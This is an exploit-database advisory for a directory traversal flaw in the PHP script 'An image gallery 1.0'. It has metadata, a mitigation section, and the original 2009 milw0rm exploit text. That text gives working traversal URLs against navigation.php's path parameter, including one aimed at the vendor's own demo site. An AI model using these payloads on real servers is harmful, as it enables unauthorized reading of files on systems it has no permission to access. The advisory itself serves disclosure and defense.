An image gallery 1.0(navigation.php) Local Directory Traversal

vendor:

An image gallery 1.0

by:

ThE g0bL!N

7.5

CVSS

HIGH

Local Directory Traversal

CWE

Product Name: An image gallery 1.0

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

An image gallery 1.0(navigation.php) Local Directory Traversal

An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g., “../”) to the vulnerable application. This can allow the attacker to access arbitrary files and directories stored on the web server.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
An image gallery 1.0(navigation.php) Local Directory Traversal
-------------------------------------------------------------------------
# Author  : ThE g0bL!N
# Download  : http://www.plohni.com/wb/content/php/download/An_image_gallery_1-0.zip
# Note: Algerie 1 - 0 Zambie
============================================
# Exploit  :
-----------
 http://localhost/PATH/navigation.php?path=../../../../../../../
#ex   :
-------
http://www.plohni.com/wb/content/php/demos/An_image_gallery/navigation.php?path=../../../../../../../windows/
============================================
Greetz:His0k4 & All My Friends
-------------------------------------------------------------------------

# milw0rm.com [2009-09-10]